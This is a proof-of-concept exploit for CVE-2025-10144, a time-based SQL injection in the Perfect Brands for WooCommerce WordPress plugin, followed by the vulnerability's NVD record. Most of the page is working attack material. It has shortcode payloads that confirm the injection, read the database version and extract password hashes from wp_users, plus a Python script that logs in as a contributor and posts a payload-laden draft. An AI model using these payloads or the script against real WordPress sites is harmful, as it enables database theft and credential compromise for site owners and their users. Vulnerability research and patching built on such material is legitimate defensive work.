CVE-2025-10144

<!-- WordPress Shortcode SQL Injection PoC --> <!-- Requires Contributor-level access or higher --> <!-- Basic injection test (time-based) --> [products brands='1' AND (SELECT 1 FROM (SELECT SLEEP(5))test)-- '] <!-- Database version extraction --> [products brands='1' UNION SELECT IF(SUBSTRING(@@version,1,1)='8',SLEEP(5),0)-- '] <!-- Table name enumeration --> [products brands='1' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM wp_options)>0 THEN SLEEP(3) ELSE SLEEP(0) END)-- '] <!-- User credential extraction example --> [products brands='1' UNION SELECT 1,2,3,IF(SUBSTRING(user_pass,1,4)=UNHEX('PASSWORD_HASH'),SLEEP(5),0) FROM wp_users LIMIT 1-- '] <!-- Python exploit script for CVE-2025-10144 --> import requests import time target_url = "https://target-site.com/" wp_session = requests.Session() # Login with Contributor+ account wp_session.post(target_url + "wp-login.php", data={ "log": "attacker_username", "pwd": "attacker_password" }) # Time-based blind SQL injection to extract database version def test_sql_injection(): # True condition - should delay response true_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))test)-- " # False condition - no delay false_payload = "1' AND 1=2-- " post_data = { "content": f"[products brands='{true_payload}']", "post_status": "draft" } start = time.time() wp_session.post(target_url + "wp-admin/post.php", data=post_data) elapsed = time.time() - start if elapsed > 4: print("[+] SQL Injection confirmed!") else: print("[-] Injection failed") test_sql_injection()

{"cve": {"id": "CVE-2025-10144", "sourceIdentifier": "[email protected]", "published": "2025-11-24T23:15:46.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Perfect Brands for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the `brands` attribute of the `products` shortcode in all versions up to, and including, 3.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/perfect-woocommerce-brands/tags/3.6.0/lib/class-woocommerce.php#L112", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4618bfd-77d9-4396-b041-d7ba0f6ec75a?source=cve", "source": "[email protected]"}]}}